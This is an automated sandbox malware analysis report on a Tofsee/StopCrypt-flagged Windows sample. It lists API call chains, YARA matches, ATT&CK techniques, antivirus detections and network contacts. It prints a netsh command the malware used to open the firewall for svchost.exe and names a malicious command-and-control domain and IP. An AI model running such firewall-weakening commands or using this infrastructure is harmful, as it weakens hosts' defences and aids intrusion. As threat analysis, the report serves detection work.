            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount,0_2_0040EC54
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,0_2_0040B211
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,0_2_0040405E
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,0_2_00409326

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            Changes security center settings (notifications, updates, antivirus, firewall)
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
            Modifies the windows firewall
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
            Source: svchost.exe, 00000017.00000002.528133562.000001E068E3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@V%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 00000022.00000002.528905739.00000290CD1F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
            Source: svchost.exe, 00000017.00000002.528226772.000001E068F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 00000022.00000002.528905739.00000290CD1F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe

            Stealing of Sensitive Information

            barindex
            Yara detected Tofsee
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OcmKX57vR7.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pjzcupje.exe PID: 6792, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6936, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Tofsee
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.OcmKX57vR7.exe.af0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.svchost.exe.2510000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.svchost.exe.2510000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.OcmKX57vR7.exe.ad0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.3.pjzcupje.exe.b50000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b50000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b50000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.b30e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.pjzcupje.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.285025584.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.283655690.0000000000B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OcmKX57vR7.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: pjzcupje.exe PID: 6792, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6936, type: MEMORYSTR
            Source: C:\Users\user\Desktop\OcmKX57vR7.exeCode function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,0_2_004088B0
            Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exeCode function: 13_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,13_2_004088B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_025188B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,17_2_025188B0

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Valid Accounts            		1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		3
            Disable or Modify Tools            		OS Credential Dumping2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts41
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts2
            Command and Scripting Interpreter            		14
            Windows Service            		1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		Security Account Manager1
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts3
            Service Execution            		Logon Script (Mac)14
            Windows Service            		21
            Software Packing            		NTDS25
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer112
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon Script412
            Process Injection            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            File Deletion            		Cached Domain Credentials22
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items12
            Masquerading            		DCSync1
            System Owner/User Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Valid Accounts            		Proc Filesystem1
            Remote System Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)22
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
            Access Token Manipulation            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron412
            Process Injection            		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 658475 Sample: OcmKX57vR7 Startdate: 07/07/2022 Architecture: WINDOWS Score: 100 56 microsoft-com.mail.protection.outlook.com 2->56 62 Snort IDS alert for network traffic 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 8 other signatures 2->68 8 pjzcupje.exe 2->8         started        11 OcmKX57vR7.exe 2 2->11         started        14 svchost.exe 2->14         started        16 11 other processes 2->16 signatures3 process4 dnsIp5 76 Detected unpacking (changes PE section rights) 8->76 78 Detected unpacking (overwrites its own PE header) 8->78 80 Writes to foreign memory regions 8->80 90 2 other signatures 8->90 19 svchost.exe 1 8->19         started        50 C:\Users\user\AppData\Local\...\pjzcupje.exe, PE32 11->50 dropped 82 Uses netsh to modify the Windows network and firewall settings 11->82 84 Modifies the windows firewall 11->84 23 cmd.exe 1 11->23         started        26 netsh.exe 3 11->26         started        28 cmd.exe 2 11->28         started        32 3 other processes 11->32 86 Changes security center settings (notifications, updates, antivirus, firewall) 14->86 30 MpCmdRun.exe 1 14->30         started        52 127.0.0.1 unknown unknown 16->52 54 192.168.2.1 unknown unknown 16->54 88 Query firmware table information (likely to detect VMs) 16->88 file6 signatures7 process8 dnsIp9 58 svartalfheim.top 46.173.215.82, 443, 49745, 49762 GARANT-PARK-INTERNETRU Russian Federation 19->58 60 microsoft-com.mail.protection.outlook.com 40.93.207.0, 25, 49744 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->60 70 System process connects to network (likely due to code injection or exploit) 19->70 72 Found API chain indicative of debugger detection 19->72 74 Deletes itself after installation 19->74 48 C:\Windows\SysWOW64\...\pjzcupje.exe (copy), PE32 23->48 dropped 34 conhost.exe 23->34         started        36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        44 conhost.exe 32->44         started        46 conhost.exe 32->46         started        file10 signatures11 process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            OcmKX57vR7.exe49%VirustotalBrowse
            OcmKX57vR7.exe46%MetadefenderBrowse
            OcmKX57vR7.exe85%ReversingLabsWin32.Ransomware.StopCrypt
            OcmKX57vR7.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\pjzcupje.exe100%AviraHEUR/AGEN.1242277
            C:\Users\user\AppData\Local\Temp\pjzcupje.exe100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            17.2.svchost.exe.2510000.0.unpack100%AviraBDS/Backdoor.GenDownload File
            0.2.OcmKX57vR7.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
            0.3.OcmKX57vR7.exe.af0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
            13.3.pjzcupje.exe.b50000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
            13.2.pjzcupje.exe.b50000.2.unpack100%AviraBDS/Backdoor.GenDownload File
            0.2.OcmKX57vR7.exe.ad0e67.1.unpack100%AviraTR/Patched.Ren.GenDownload File
            13.2.pjzcupje.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
            13.2.pjzcupje.exe.b30e67.1.unpack100%AviraTR/Patched.Ren.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            svartalfheim.top11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.pango.co/privacy0%URL Reputationsafe
            https://www.tiktok.com/legal/report0%URL Reputationsafe
            svartalfheim.top:443100%Avira URL Cloudmalware
            https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
            http://crl.ver)0%Avira URL Cloudsafe
            https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
            https://%s.xboxlive.com0%URL Reputationsafe
            https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
            jo:4430%Avira URL Cloudsafe
            https://dynamic.t0%URL Reputationsafe
            https://disneyplus.com/legal.0%URL Reputationsafe
            http://help.disneyplus.com.0%URL Reputationsafe
            https://%s.dnet.xboxlive.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            svartalfheim.top
            		46.173.215.82
            		truetrueunknown
            microsoft-com.mail.protection.outlook.com
            		40.93.207.0
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              svartalfheim.top:443true
              • Avira URL Cloud: malware
              		unknown
              jo:443true
              • Avira URL Cloud: safe
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://t0.tiles.ditu.live.com/tiles/genisvchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.hotspotshield.com/terms/svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.pango.co/privacysvchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.tiktok.com/legal/reportsvchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.bingmapsportal.comsvchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000015.00000003.317741272.000001E9FBE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318344962.000001E9FBE6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://crl.ver)svchost.exe, 0000001A.00000002.528990396.0000023757A8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438828550.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.401236022.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528434490.00000290CC8DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001E.00000003.419259422.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419125131.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419241431.000001D6C59A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419194698.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://%s.xboxlive.comsvchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		low
                                                          https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000003.317808860.000001E9FBE4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.318051847.000001E9FBE50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/09/enumersvchost.exe, 0000001A.00000002.528559919.00000237524A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
